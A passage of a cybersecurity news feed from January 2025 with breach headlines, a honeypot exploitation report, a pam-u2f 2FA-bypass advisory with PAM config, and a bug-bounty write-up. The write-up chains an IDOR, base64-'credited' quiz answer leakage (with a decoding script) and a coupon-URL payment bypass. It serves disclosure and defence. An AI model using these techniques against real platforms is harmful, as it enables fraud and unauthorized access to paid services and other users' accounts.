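        print("hardened dispatcher denies:", exc)
```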
by InfoSec Write-ups
2025-01-20 15:11:45
Microsoft: Exchange 2016 and 2019 reach end of support in October
Microsoft has reminded admins that Exchange 2016 and Exchange 2019 will reach the end of extended support in October and shared guidance for those who need to decommission outdated servers. [...]
by BleepingComputer
2025-01-20 15:03:57
20th January – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 20th January, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Hotel management platform Otelier has suffered a data breach that resulted in the extraction of almost eight terabytes of data. The threat actors compromised the company’s Amazon S3 cloud storage, stealing guests’ personal information […]
by Check Point Research
2025-01-20 15:02:37
Is Carding Still a Thing in 2025
“Is the Threat Finally Diminishing?”
by InfoSec Write-ups
2025-01-20 15:00:00
Manager as mentor: Learnings from Sysdig’s documentation team
After years in the technical writing trenches at industry giants like Cisco, Riverbed, and Akamai, I now lead the Sysdig...
by Sysdig
2025-01-20 14:54:49
Cyble Sensors Detect Attacks on Check Point, Ivanti and More

Cyble honeypots have detected vulnerability exploits on Check Point and Ivanti products, databases, CMS systems, and many other IT products.

Overview
Cyble honeypot sensors have detected new attacks on vulnerabilities in Check Point and Ivanti products, among dozens of other vulnerability exploits recently picked up by Cyble sensors. Cyble’s sensor intelligence reports to clients in the first two weeks of 2025 also highlighted new database and CMS attacks. Unpatched Linux systems and network and IoT devices remain popular targets for hackers looking to breach networks and add to botnets. The reports also examined new brute-force attacks and phishing campaigns. Here are some of the highlights.

Vulnerabilities Under Attack
Here are some of the vulnerability exploits detected by Cyble sensors.

CVE-2024-24919 is an 8.6-severity vulnerability affecting Check Point CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, and Quantum Spark Appliances, identified by Check Point as being actively exploited. If successfully exploited, the vulnerability could allow an attacker to access sensitive information on Internet-connected gateways that have a remote access VPN or mobile access enabled, and potentially move laterally and gain domain admin privileges.

Ivanti had a challenging 2024, with 11 vulnerabilities added to CISA’s Known Exploited Vulnerabilities catalog, trailing only Microsoft, and new vulnerabilities have already been added this year. One particular Ivanti vulnerability that Cyble is detecting attacks on is CVE-2024-7593, a 9.8-severity Ivanti Virtual Traffic Manager (vTM) vulnerability that enables a remote, unauthenticated attacker to bypass admin panel authentication due to a flawed implementation of the authentication algorithm.

Attackers are exploiting CVE-2024-8503, a time-based SQL injection vulnerability in VICIDIAL that could allow an unauthenticated attacker to enumerate database records. By default, VICIDIAL stores plaintext credentials within the database. VICIDIAL is a software suite that works with the Asterisk open-source PBX phone system to create an inbound/outbound contact center.

CVE-2024-7120 is a critical OS command injection vulnerability in the web interface of Raisecom MSG gateways, specifically MSG1200, MSG2100E, MSG2200, and MSG2300 devices running version 3.90. The flaw in the list_base_config.php file allows remote attackers to exploit the template parameter to execute arbitrary commands. Public exploits are available for this vulnerability.

CVE-2024-56145 is a critical vulnerability in Craft CMS systems. If the register_argc_argv setting in php.ini is enabled, this issue affects users of impacted versions, allowing an unspecified remote code execution vector. Users are advised to update to versions 3.9.14, 4.13.2, or 5.5.2. Those unable to upgrade should mitigate the risk by disabling register_argc_argv in their PHP configuration.

Cyble sensors have also identified attackers scanning for the URL "/+CSCOE+/logon.html", which is used to access the login page for the Cisco Adaptive Security Appliance (ASA) WebVPN service. The URL has been found to have various vulnerabilities, including cross-site scripting, path traversal, and HTTP response splitting, which could allow attackers to execute arbitrary code, steal sensitive information, or cause a denial of service.

Brute-Force Attacks
The Cyble sensor reports also include considerable detail on brute-force attacks. These attacks frequently target remote desktops and access systems, with ports 5900 (VNC), 3389 (RDP), and 22 (SSH) being the most frequently attacked ports. Other frequently attacked ports include 3386 (GPRS tunneling), 445 (SMB), and 23 (Telnet). Cyble advises adding security system blocks for frequently attacked ports.

Recommendations and Mitigations
Cyble researchers recommend the following security controls:
- Blocking target hashes, URLs, and email info on security systems (Cyble clients receive a separate IoC list).
- Immediately patch all open vulnerabilities listed here and routinely monitor the top Suricata alerts in internal networks.
- Constantly check for attackers’ ASNs and IPs.
- Block brute-force attack IPs and the targeted ports listed.
- Immediately reset default usernames and passwords to mitigate brute-force attacks and enforce periodic changes.
- For servers, set up strong passwords that are difficult to guess.

Conclusion
With many active threats against both new and older vulnerabilities, organizations need to remain vigilant and responsive, patching quickly and applying mitigations where patching isn’t possible. To protect their digital assets, organizations should address known vulnerabilities and implement recommended security controls, such as blocking malicious IPs and securing network ports. A proactive and layered security approach is critical for defending against exploits and data breaches. To access the full sensor intelligence reports from Cyble, along with IoCs and additional insights and details, click here.
by CYBLE
2025-01-20 14:50:24
Your location or browsing habits could lead to price increases when buying online
Companies are showing customers different prices for the same goods and services based on what data they have on them, including details like their precise location or browser history.
by Malwarebytes Labs
2025-01-20 14:32:58
From Assessment to Action: The Red Siege Security Posture Review Is Here
At Red Siege, we’ve earned our reputation as a leader in offensive security by delivering expert-driven solutions that prioritize what matters most to CISOs and cybersecurity professionals. From penetration testing […]
by Red Siege Blog
2025-01-20 14:30:00
US Ban on Automotive Components Could Curb Supply Chain
The US Department of Commerce will prohibit the import of components for connected vehicles from China or Russia, as the US continues to ban technology it sees as a potential national security threat.
by Dark Reading
2025-01-20 14:06:38
HPE investigates breach as hacker claims to steal source code
Hewlett Packard Enterprise (HPE) is investigating claims of a new breach after a threat actor said they stole documents from the company’s developer environments. [...]
by BleepingComputer
2025-01-20 14:00:00
Phishing Attacks Are the Most Common Smartphone Security Issue for Consumers
New hands-on testing results show that most devices are unable to catch phishing emails, texts, or calls, leaving users at risk.
by Dark Reading
2025-01-20 13:41:41
Social Media Security Firm Spikerz Raises $7 Million
Social media security startup Spikerz has raised $7 million in a seed funding round led by Disruptive AI.
by SecurityWeek
2025-01-20 13:17:11
Details Disclosed for Mercedes-Benz Infotainment Vulnerabilities
Kaspersky has disclosed the details of over a dozen vulnerabilities discovered in a Mercedes-Benz MBUX infotainment system.
by SecurityWeek
2025-01-20 13:03:56
Threat Actors Abuse Google Translate to Craft Phishing Links
Threat actors are abusing Google Translate’s redirect feature to craft phishing links that appear to belong to, according to researchers at Abnormal Security.
by KnowBe4
2025-01-20 13:03:20
Phishing Campaign Attempts to Bypass iOS Protections
An SMS phishing (smishing) campaign is attempting to trick Apple device users into disabling measures designed to protect them against malicious links, BleepingComputer reports.
by KnowBe4
2025-01-20 13:03:07
African firms worry over state cyber safeguards – The Citizen
A recent Global Cybersecurity Outlook report by the World Economic Forum reveals that over 40% of African companies lack confidence in their governments’ ability to handle major cybersecurity incidents, a higher percentage than in other global regions.
by Zendata
2025-01-20 13:02:32
From Pig Butchering to People Talking
Interpol has recently recommended discontinuing the use of the term "Pig Butchering" in cybercrime discussions, expressing concern that such terminology may discourage victims from reporting incidents due to feelings of shame or embarrassment.
by KnowBe4
2025-01-20 13:01:05
From Uncovering to Securing: Tackling Three Vulnerabilities in Educational Domain

In the ever-evolving landscape of digital education, ensuring the security of online platforms is paramount. As a security researcher, I have dedicated my efforts to uncovering vulnerabilities that could question the integrity and safety of online educational domains. In this article, I will walk you through three different bugs I discovered within the educational domain, detailing the journey from initial discovery to successful patching. By sharing these insights, I hope to highlight the importance of robust security measures in protecting our digital learning environments.

My target was an educational platform offering a variety of paid and free courses, with a straightforward account registration process that was free of charge. As I delved into the platform’s infrastructure, I discovered several vulnerabilities that could potentially be exploited. In the upcoming sections, I will provide a detailed analysis of each vulnerability, including how they were identified and their potential impact.

1. IDOR to answer questions on behalf of the victim
The first vulnerability I discovered was an Insecure Direct Object Reference (IDOR), which allowed an attacker to answer questions on behalf of other users. This flaw was found in the platform’s quiz and assessment feature, where users could submit answers to various questions in the respective module. By simply changing the numeric value in the request that represented the answer ID of a user, an attacker could manipulate the ID to submit answers as if they were the victim. The PUT request would look something like:
[Image: PUT request]
In the above request, simply changing the numeric value after answers would make the system answer different questions of other users, and the “choice_id” stores the numeric value representing options like a, b, c or d.

2. Leaking Quiz Answers in API request
Whenever any course or certification is bought, users should answer all the questions correctly in order to pass the course or certification. Upon attempting questions after completing each module, an API endpoint labeled “GET /api/course_player/v2/quizzes/{value}” was called. This endpoint retrieves multiple-choice question (MCQ) quizzes, and the response includes questions along with their respective options. Each option within the response contains a parameter named “credited”, which holds a Base64 encoded value. Upon decoding this value, it reveals whether the option is correct or not, denoted by either “true” or “false.” The vulnerable GET request would look like:
[Image: GET request]
And the JSON response which exposes the correct answers to the quiz questions was like:
[Image: JSON response]
So, above is a small JSON response for one of the questions, and you can see there are four options named {option_one, option_two, option_three, option_four} for that question along with the parameter ‘credited’ containing values like: [NjR0cnVlNDk=, NzhmYWxzZTY5, MjBmYWxzZTg2, MTAwZmFsc2U0Mg==]. On decoding these values, we get [64true49, 78false69, 20false86, 100false42], exposing which options are actually true and which are false before actually answering the questions in the browser.

3. BAC to payment bypass for paid courses
This is the last vulnerability I encountered on that educational platform. There were many paid courses ranging from $199 to $999. Upon fetching the URLs of the domain, one of the URLs caught my eye. The URL was: “https://education.target.com/enroll/1413977?coupon=coupon_value”. Opening the above URL could actually enroll users in the paid course with the certification id ‘1413977’, which would cost $999 if bought. This requires no payment method and would work on any free account registered. Then, I started collecting the certificate ids from the store and replaced the certificate id in the URL. This eventually enrolled me in some of the paid courses without any payment method applied, allowing me full access to the resources and the final certification exam due to the coupon code in the URL.

Now, recalling the above vulnerabilities, the second vulnerability would allow me to know the answers of any certification exam via the vulnerable API endpoint and the third vulnerability would allow me to enroll in some of the paid courses without any payment. Combining these two vulnerabilities, I was able to get enrolled in some of the paid courses and pass the exam with all answers correct, gaining me the final certifications without paying even a dollar and without knowing anything.

After promptly reporting these security vulnerabilities, the security team swiftly triaged the issues and fixed them. So this was all about the findings. Thanks for reading till the end. You can also connect with me on LinkedIn & Twitter.
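As an added example (not the platform's code), the second and first findings in Python: the `credited` token decoded exactly as the write-up describes, beside the server-side shape that keeps the answer key off the wire, grades on the server, and checks that an answer row belongs to the authenticated user before accepting it. The quiz payload is constructed to match the shape described above; the four credited values are the ones quoted in the article, and field names other than `credited` and `choice_id` are assumptions.

```python
"""Base64 plus numeric padding is not a secret: decode it, then stop sending it."""
import base64
import json
import re

# Constructed sample in the shape the write-up describes (one question, four
# options); the four credited tokens are the values quoted in the article.
QUIZ_API_RESPONSE = json.dumps({
    "quiz_id": 4242,                       # assumed field
    "questions": [{
        "question_id": 17,                 # assumed field
        "options": {
            "option_one":   {"choice_id": 1, "credited": "NjR0cnVlNDk="},
            "option_two":   {"choice_id": 2, "credited": "NzhmYWxzZTY5"},
            "option_three": {"choice_id": 3, "credited": "MjBmYWxzZTg2"},
            "option_four":  {"choice_id": 4, "credited": "MTAwZmFsc2U0Mg=="},
        },
    }],
})

# Decoded tokens look like "64true49": digits, the verdict, digits.
_CREDITED_RE = re.compile(r"^\d+(true|false)\d+$")


def decode_credited(token: str) -> bool:
    """Undo the obfuscation and return whether the option is the credited one."""
    plain = base64.b64decode(token, validate=True).decode("ascii")
    match = _CREDITED_RE.match(plain)
    if match is None:
        raise ValueError(f"unexpected credited payload: {plain!r}")
    return match.group(1) == "true"


def leaked_answer_key(raw_response: str) -> dict:
    """What any client can recover from the vulnerable response: question_id -> choice_id."""
    key = {}
    for question in json.loads(raw_response)["questions"]:
        correct = [opt["choice_id"] for opt in question["options"].values()
                   if decode_credited(opt["credited"])]
        if len(correct) != 1:
            raise ValueError(f"question {question['question_id']} has "
                             f"{len(correct)} credited options")
        key[question["question_id"]] = correct[0]
    return key


def client_safe_response(raw_response: str) -> str:
    """Server-side fix for finding 2: strip correctness before the payload leaves."""
    doc = json.loads(raw_response)
    for question in doc["questions"]:
        for opt in question["options"].values():
            opt.pop("credited", None)
    return json.dumps(doc)


def record_answer(session_user: str, answer_owner: str, question_id: int,
                  choice_id: int, answers: dict) -> None:
    """Server-side fix for finding 1: the answer row must belong to the session user,
    regardless of which numeric answer ID the request carries."""
    if session_user != answer_owner:
        raise PermissionError("answer does not belong to the authenticated user")
    answers[(session_user, question_id)] = choice_id


def grade(answer_key: dict, user: str, answers: dict) -> dict:
    """Grade on the server against a key the client never saw."""
    return {qid: answers.get((user, qid)) == choice
            for qid, choice in answer_key.items()}


if __name__ == "__main__":
    print("leaked key:", leaked_answer_key(QUIZ_API_RESPONSE))
    print("credited in safe response:", "credited" in client_safe_response(QUIZ_API_RESPONSE))
```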
by InfoSec Write-ups
2025-01-20 13:00:53
Splunk Series: Installation Guide for Windows and Linux (Part 1)
Hello, my digital adventurers. This is the first part of my Splunk series. I will share more insights about Splunk in my upcoming articles.
by InfoSec Write-ups
2025-01-20 13:00:33
Sofia Santos: OSINT Exercise #004

OSINT Challenges
Test your OSINT skills with this challenge, uncover hidden details through your investigative skills
[Background Image by BiZkettE1 on Freepik]

In this write-up I will be going over OSINT Exercise #004 by Sofia Santos.

OSINT Exercise #004
Task
We have a photo of a resort located on an island. We have 3 questions to answer:
a) What is the name of the resort?
b) What are the coordinates of the island?
c) In which cardinal direction was the camera facing when the photo was taken?

Solution
Task 1
We can use an image reverse search service (TinEye, Google Images) to find other articles/images that contain the photo we are given. The search result shows us that the resort in the image is called “Oan Resort”. The resort is located on Oan Island, Wonip, Micronesia.

Task 2
Searching for “Oan Resort” on Google Maps will bring up the listing for the resort. We can get the coordinates for the resort by right-clicking on the pin icon on the map.
[Image: Oan Resort — Google Maps]
The resort is located at “7.3625207, 151.7561042”.

Task 3
For the 3rd question we can utilize the 3D view feature provided by Google Maps. This feature can be enabled by clicking on Layers → More → Global View. We need to position the 3D view camera in such a way that it resembles the angle from which the photo was taken. Once we have the correct view we can use the compass on the map to figure out the direction of the camera.
If we look closely at the image we can see that behind Oan Island towards the left side some islands are visible.
The compass on Google Maps uses the red arrow to represent North; the grey arrow represents South. The position represented by the top of the compass shows the direction the virtual camera is facing.
If we look at a compass with the cardinal directions and set it such that North is slightly towards the right, we will see that we are facing North West. From this we can conclude that the camera that was used to take the image was facing “North West”.

List of OSINT Exercises - Challenge Yourself!

If you found this write-up to be useful consider:
- Liking the Post: You can like (applaud) the post up to 50 times.
- Leave a Comment: Your feedback and comments are invaluable. They not only support me, but also enrich the discussion for other readers.
- Share the Article: If you believe others would benefit from this article, please consider sharing it within your network.
- Follow Me: Feel free to connect with me on Medium, LinkedIn, GitHub and Discord.
- Explore More: All of my posts can also be accessed on Source Code.
Thank you for your time. Your support motivates me to continue writing.
by InfoSec Write-ups
2025-01-20 13:00:22
Insecure Randomness on TryHackMe: Practical Guide Using a Windows Machine
We are exposed to PHP web applications with backend logic in this room. 💻 I won’t go into detail since it’s a guided room; instead, I’ll…
by InfoSec Write-ups
2025-01-20 12:45:49
Fintech Bill Pay Platform “Willow Pays” Exposes Over 240,000 Records
Security researcher discovers a non-password-protected database containing over 240,000 records belonging to US-based FinTech bill payment platform Willow…
by Hackread
2025-01-20 12:32:48
Malicious npm and PyPI target Solana Private keys to steal funds from victims’ wallets
Researchers found malicious npm and PyPI packages capable of stealing and deleting sensitive data from infected systems. Socket researchers have identified multiple packages in the npm and Python Package Index (PyPI) repository designed to target Solana private keys and drain funds from victims’ wallets. The malicious npm packages allowed the threat actors to exfiltrate Solana […]
by Security Affairs
2025-01-20 12:29:20
Microsoft fixes Windows Server 2022 bug breaking device boot
Microsoft has fixed a bug that was causing some Windows Server 2022 systems with two or more NUMA nodes to fail to start up. [...]
by BleepingComputer
2025-01-20 12:26:39
FCC Taking Action in Response to China’s Telecoms Hacking
The FCC adopts a declaratory ruling requiring telecommunications providers to secure their networks against nation-states and other threats.
by SecurityWeek
2025-01-20 11:44:04
Telegram-Based “Sneaky 2FA” Phishing Kit Targets Microsoft 365 Accounts
Sneaky 2FA: New Phishing-as-a-Service targets Microsoft 365, leveraging sophisticated evasion techniques and a Telegram-based platform to steal credentials.…
by Hackread
2025-01-20 11:38:43
CISA, FBI Update Software Security Recommendations
CISA and the FBI have updated their guidance regarding risky software security bad practices based on feedback received from the public.
by SecurityWeek
2025-01-20 11:24:24
Yubico Warns of 2FA Security Flaw in pam-u2f for Linux and macOS Users

Yubico has released a security advisory, YSA-2025-01, which highlights a vulnerability within the software module that supports two-factor authentication (2FA) for Linux and macOS platforms. This issue, tracked as CVE-2025-23013, allows for a partial bypass of 2FA protections when using YubiKeys or other FIDO-compatible authenticators. The vulnerability poses a high-risk security threat and could potentially compromise authentication processes for users relying on Yubico’s open-source pam-u2f software.

Yubico’s pam-u2f software package, a Pluggable Authentication Module (PAM) used to integrate YubiKey and other FIDO-compliant devices with Linux and macOS systems, contains a vulnerability that can lead to a 2FA bypass in some configurations. This flaw primarily affects systems running versions of pam-u2f prior to 1.3.1, where the authentication process does not correctly handle certain errors. In particular, when the system experiences issues such as memory allocation errors or the absence of necessary files, the pam-u2f module may fail to trigger proper authentication checks.

The 2FA Bypass Vulnerability
The 2FA bypass vulnerability arises in the pam_sm_authenticate() function, which is responsible for managing the authentication flow. When certain conditions occur—such as failure to allocate memory or privilege escalation issues—the function returns a response of PAM_IGNORE. This prevents the system from completing the authentication process correctly, bypassing 2FA in scenarios where it should be validated. Additionally, if the nouserok option is enabled in the configuration, pam-u2f may return PAM_SUCCESS even when the authfile is missing or corrupted. This presents a critical risk, particularly in configurations where 2FA is set up as the primary or secondary authentication factor.

What Does This Mean for Users?
The vulnerability primarily affects users who have installed pam-u2f on Linux or macOS systems via methods like apt or manual installation. Specifically, users with versions of pam-u2f prior to 1.3.1 are vulnerable to this issue, which may lead to unauthorized access if the system’s 2FA protections are bypassed. However, no hardware used for 2FA, including any YubiKey devices, is affected by this vulnerability. The issue lies entirely within the software configuration, not the hardware security keys. Yubico has recommended that all affected customers upgrade to the latest version of pam-u2f immediately to mitigate the vulnerability. Users can download the latest release directly from Yubico’s GitHub repository or update via Yubico’s Personal Package Archive (PPA).

How Are Different Configurations Impacted?
The severity of the vulnerability varies depending on the system configuration. For instance:
- Single Factor Authentication with User-Managed Authfile: In this scenario, where pam-u2f is used as a single factor and the authfile is located in the user’s home directory, an attacker could remove or corrupt the authfile. This would cause pam-u2f to return PAM_SUCCESS, allowing unauthorized access and potentially escalating privileges if the user has sudo access. This scenario has been assigned a CVSS score of 7.3, indicating a high severity.
- Two-Factor Authentication with Centrally Managed Authfile: If pam-u2f is used alongside a user’s password for two-factor authentication, the vulnerability may be triggered by a memory allocation error or a lack of necessary files. In this case, the second authentication factor may fail to verify, leaving the system open to attacks. This scenario carries a CVSS score of 7.1.
- Use of pam-u2f as a Single Authentication Factor with Other PAM Modules: When pam-u2f is used in conjunction with other PAM modules that do not perform authentication, forcing a PAM_IGNORE response would prevent any authentication from occurring. If the user has administrative privileges, this could lead to local privilege escalation. This scenario also carries a CVSS score of 7.3.

Conclusion
Yubico urges affected customers to immediately upgrade to the latest version of pam-u2f to protect against the 2FA bypass vulnerability, with alternative mitigation measures available for those unable to update right away. This advisory highlights the crucial role of two-factor authentication (2FA) in securing systems, while also showing that vulnerabilities within 2FA solutions can still pose risks.
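As an added illustration (constructed here, not taken from Yubico's advisory or its shipped configuration), the first advisory scenario beside a centrally managed two-factor layout, as an /etc/pam.d excerpt; nouserok and authfile= are real pam-u2f options, while the service file and the mapping-file path are assumptions.

```conf
# Constructed /etc/pam.d/sudo excerpt (service file and paths are assumptions).

# Advisory scenario 1: pam-u2f as the only factor, authfile in the user's
# home directory (pam-u2f's default location) and nouserok set. On pam-u2f
# versions before 1.3.1 a missing or corrupted authfile is answered with
# PAM_SUCCESS, so a user who can delete their own file skips the check.
auth    required    pam_u2f.so    nouserok

# Centrally managed layout: password first, then pam-u2f reading a root-owned
# mapping file that the user cannot remove, with nouserok left off so a user
# without a registered key is refused rather than waved through.
auth    required    pam_unix.so
auth    required    pam_u2f.so    authfile=/etc/u2f_mappings
```

The second layout removes the nouserok fail-open but is the advisory's second scenario (CVSS 7.1) on an unpatched module, where an allocation failure still yields PAM_IGNORE; the upgrade to 1.3.1 remains the fix.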
by The Cyber Express
2025-01-20 11:18:40
HPE Investigating Breach Claims After Hacker Offers to Sell Data
HPE is investigating claims by the hacker IntelBroker, who is offering to sell source code and other data allegedly stolen from the tech giant.
by SecurityWeek
2025-01-20 11:15:00
Hackers Deploy Malicious npm Packages to Steal Solana Wallet Keys via Gmail SMTP
Cybersecurity researchers have identified three sets of malicious packages across the npm and Python Package Index (PyPI) repository that come with capabilities to steal data and even delete sensitive data from infected systems. The list of identified packages is below -
- @async-mutex/mutex, a typosquat of async-mute (npm)
- dexscreener, which masquerades as a library for accessing liquidity pool
by The Hacker News
2025-01-20 11:00:00
The Human Touch in Tech: Why Local IT Support Remains Essential
As automation and AI reshape IT support, local providers continue to shine by offering personalized service, rapid on-site assistance, and creative problem-solving for complex issues.
by ITPro Today
2025-01-20 11:00:00
TikTok Restores Service for US Users Based on Trump’s Promised Executive Order
TikTok restored service to users in the United States on Sunday just hours after the popular video-sharing platform went dark in response to a federal ban.
by SecurityWeek
2025-01-20 10:00:00
Hybrid Cloud, AI Emerge as Critical Priorities for IT Leaders in 2025, Rackspace Study Finds
Organizations are increasingly reconsidering where they put their money and workloads in the cloud as AI becomes a new driver.
by ITPro Today
2025-01-20 09:37:50
Budget 2025 on the Horizon: Will India Take the Leap in Enhancing Cybersecurity and Data Privacy?

With the Budget 2025 soon to be announced, India stands at a pivotal moment in its digital transformation journey, increasingly relying on digital platforms and technologies for business, governance, and daily life. As the nation’s digital ecosystem experiences exponential growth, driven by a surge in mobile applications, the need to enhance its cybersecurity infrastructure has never been more urgent.

Sharing his perspective on this vital issue, Manish Mimani, Founder and CEO of Protectt.ai, emphasizes that the Union Budget 2025 offers a pivotal opportunity to strengthen India’s digital & cybersecurity framework. Mimani highlights the need for focused financial reforms, strategic investments, and innovative policies to bolster India’s defenses against growing cyber risks, while fostering a culture of resilience and innovation in the cybersecurity ecosystem. The following key recommendations by Mimani outline how Budget 2025 can play a transformative role in securing India’s digital future:

Budget 2025: What to Expect for Cybersecurity

Establishing a Cybersecurity Research & Development (R&D) Institute in Multiple Cities
The government could allocate funds to establish a dedicated R&D institute focused on cybersecurity. This hub would foster innovation and develop advanced security solutions tailored to India’s unique needs. By nurturing homegrown technologies, India can reduce reliance on foreign solutions and position itself as a global leader in cybersecurity innovation.

Financial Incentives for Cybersecurity Startups
Targeted financial incentives, such as tax holidays, grants, and subsidized loans, could stimulate the growth of startups specializing in cybersecurity. Encouraging innovation in this sector would not only strengthen India’s defenses but also allow the nation to capture a larger share of the growing global cybersecurity market.

Upskilling and Talent Development
Bridging the cybersecurity skills gap is essential for safeguarding India’s digital future. The budget could fund comprehensive training and upskilling programs, including partnerships with educational institutions to develop specialized curricula. Subsidized training for IT professionals and initiatives to attract talent to cybersecurity careers would help ensure a robust pipeline of skilled professionals.

Public-Private Partnerships for Cybersecurity Infrastructure
Allocating budgetary support for public-private partnerships (PPPs) could accelerate the development of shared cybersecurity resources. Collaborative initiatives between the government and private sector would create platforms for threat intelligence sharing, infrastructure development, and advanced research, bolstering India’s ability to counter emerging cyber threats.

Reduction in GST on 100% Made in India Cybersecurity Products
Reducing the Goods and Services Tax (GST) on cybersecurity software and tools could make essential safeguards more affordable for businesses, especially small and medium enterprises (SMEs). Currently taxed at 18%, lowering this rate would enable wider adoption of advanced security solutions, enhancing the resilience of India’s digital infrastructure.

Lower Import Duties on Critical Hardware
High import duties on servers, GPUs, and other essential components inflate the cost of building robust cybersecurity systems. By reducing these duties, the government could make cutting-edge technology more accessible to businesses, enabling real-time threat detection and efficient anomaly analysis across sectors.

Tax Benefits for Cybersecurity Investments
Introducing tax incentives for businesses that implement strong cybersecurity measures could encourage proactive adoption of best practices. Deductions for investments in cybersecurity audits, penetration testing, and advanced security systems would foster a more secure digital ecosystem.

Conclusion
The Union Budget 2025 represents a significant opportunity to bolster India’s cybersecurity capabilities. By adopting strategic measures such as tax incentives, reduced GST rates, and investments in R&D and talent development, the government can create a more resilient and secure digital environment. As businesses and citizens increasingly depend on digital platforms, mobile app security emerges as a critical focus area within the broader cybersecurity landscape. By directing resources and attention to this domain, India can ensure the safety of its digital economy, foster innovation, and maintain its appeal as a global hub for technology and investment.
by The Cyber Express
2025-01-20 09:33:19
Agent vs. Agentless Cloud Security: Why Deployment Methods MatterCloud security solutions can be deployed with agentless or agent-based approaches or use a combination of methods. Organizations must weigh which method applies best to the assets and data the tool will protect.
by Darktrace
2025-01-20 09:22:03
CERT-UA warns against “security audit” requests via AnyDeskAttackers are impersonating the Computer Emergency Response Team of Ukraine (CERT-UA) via AnyDesk to gain access to target computers. “Unidentified individuals are sending connection requests via AnyDesk under the pretext of conducting a ‘security audit to verify the level of protection,’ using the name ‘CERT.UA,’ the CERT-UA logo, and the AnyDesk ID “1518341498” (which may vary),” CERT-UA explained on Friday. The requests are apparently unarranged and the attackers are counting on … More → The post CERT-UA warns against “security audit” requests via AnyDesk appeared first on Help Net Security.
by Help Net Security
2025-01-20 08:49:58
U.S. Sanctions Chinese Cyber Actors Behind Treasury Breach and Salt Typhoon AttacksThe U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) issued sanctions against two entities linked to major cyber activities targeting U.S. national security. The sanctions target Yin Kecheng, a Shanghai-based cyber actor involved in a recent compromise of Treasury Department networks, and Sichuan Juxinhe Network Technology Co., LTD., a cybersecurity company connected to the notorious Salt Typhoon hacker group. These sanctions are part of the U.S. government’s ongoing efforts to combat the growing threat posed by cyber actors associated with the People’s Republic of China (PRC). Yin Kecheng is identified as a key figure behind the breach of the Department of the Treasury’s Departmental Offices network. This incident is part of a broader trend of PRC-based malicious cyber activity aimed at infiltrating U.S. government systems. According to OFAC, Yin has been active in cyber espionage for over a decade and is linked to China’s Ministry of State Security (MSS). The Treasury Department’s sanctions against Yin Kecheng are based on Executive Order (E.O.) 13694, which targets individuals and entities involved in cyber-enabled activities that pose a threat to U.S. national security, foreign policy, or economic interests. Adewale O. Adeyemo, the Deputy Secretary of the Treasury, emphasized the department’s commitment to holding cyber actors accountable. “The Treasury Department will continue to use its authorities to hold accountable malicious cyber actors who target the American people, our companies, and the United States government, including those who have targeted the Treasury Department specifically,” said Adeyemo. Salt Typhoon and the Increasing Threat of Cyber Intrusions The sanctions also extend to Sichuan Juxinhe Network Technology Co., LTD., a Chinese cybersecurity firm directly involved in the cyber activities of the Salt Typhoon group. 
Active since at least 2019, Salt Typhoon has been responsible for significant breaches within U.S. telecommunication and internet service provider networks. Most recently, the group compromised the infrastructure of several major companies within these sectors, further escalating concerns over Chinese cyber operations against critical U.S. infrastructure. Salt Typhoon’s operations are not isolated. They represent a growing number of cyber activities attributed to PRC-linked actors. These incidents necessitate costly remediation efforts for impacted organizations and threaten the stability of critical national infrastructure. Sichuan Juxinhe is known for its direct involvement in exploiting vulnerabilities in U.S. networks and has maintained strong ties with Chinese state-sponsored entities. According to OFAC, these actions are consistent with the broader strategy of Chinese state-backed cyber groups targeting critical U.S. infrastructure. Treasury Department’s Ongoing Efforts to Counter Cyber Threats The sanctions against Yin Kecheng and Sichuan Juxinhe are part of a series of measures aimed at curbing increasingly reckless cyber activities tied to China. On January 3, 2025, OFAC sanctioned Integrity Technology Group, Inc. for its role in Flax Typhoon’s malicious activities. Previous actions in 2024 also saw the designation of entities like Sichuan Silence Information Technology Company, Ltd., responsible for compromising U.S. firewalls, and Wuhan Xiaoruizhi Science and Technology Company, Ltd., linked to the Advanced Persistent Threat (APT) 31 group. These sanctions are a crucial part of the U.S. government’s strategy to protect its cyber infrastructure and prevent further compromises by malicious actors. The Office of the Director of National Intelligence’s Annual Threat Assessment further highlighted that Chinese cyber actors, including those linked to the MSS, remain some of the most persistent threats to U.S. national security. 
Conclusion To strengthen its efforts against cyber threats, the U.S. Department of State is offering a reward of up to $10 million for information leading to the identification or location of individuals involved in malicious cyber activities targeting U.S. critical infrastructure, with the Rewards for Justice program encouraging people to come forward with such information. In parallel, the U.S. Treasury’s sanctions against Yin Kecheng and Sichuan Juxinhe, and their ties to the Salt Typhoon hacker group, ensure that any property or interests tied to these entities in the U.S. are blocked, with strict penalties for violations of these sanctions. The Treasury Department’s enforcement of these measures sends a strong message about the seriousness of cybersecurity and highlights the U.S. government’s commitment to combating foreign cyber threats, reinforcing the need for international cooperation in addressing these growing challenges to national security.
by The Cyber Express
2025-01-20 08:46:20
Elon Musk Offers to Fix U.S. Government IT Systems, Calls It Harder Than Space MissionsElon Musk, the CEO of Tesla and SpaceX, has made waves with a bold statement regarding the cybersecurity vulnerabilities within the U.S. government. Musk took to social media platform X (formerly Twitter), responding to a report on a Chinese cyberattack that breached U.S. Treasury systems. Musk’s comment was clear: he could “fix” the government’s Information Technology (IT) department, adding that the task would be “harder than getting a rocket to orbit.” This candid reply came in response to a post by Mario Nawfal, Founder of IBC Group, who shared the news that Chinese state-sponsored hackers had infiltrated the U.S. Treasury Department, compromising systems that included devices belonging to key officials such as Treasury Secretary Janet Yellen and her deputies. Musk, whose ventures have disrupted industries across the globe, wasn’t shy about his willingness to take on the monumental task of improving the government’s IT systems. In a world increasingly under the threat of cyberattacks, Musk’s words have sparked curiosity, debate, and a sense of urgency among those invested in cybersecurity. Musk’s response, “My goal is to fix government IT! This is harder than getting a rocket to orbit. Actually,” immediately caught the attention of many. Known for his ambitious goals, Musk is no stranger to challenges. Whether it’s revolutionizing electric cars with Tesla, sending humans to Mars with SpaceX, or advancing renewable energy solutions, Musk has built a reputation for pushing the boundaries of what’s possible. So, when he speaks about tackling the cybersecurity woes of the U.S. government, people take note. U.S. Government Grapples with Increasing Cyber Threats Musk’s comments come at a time when the U.S. 
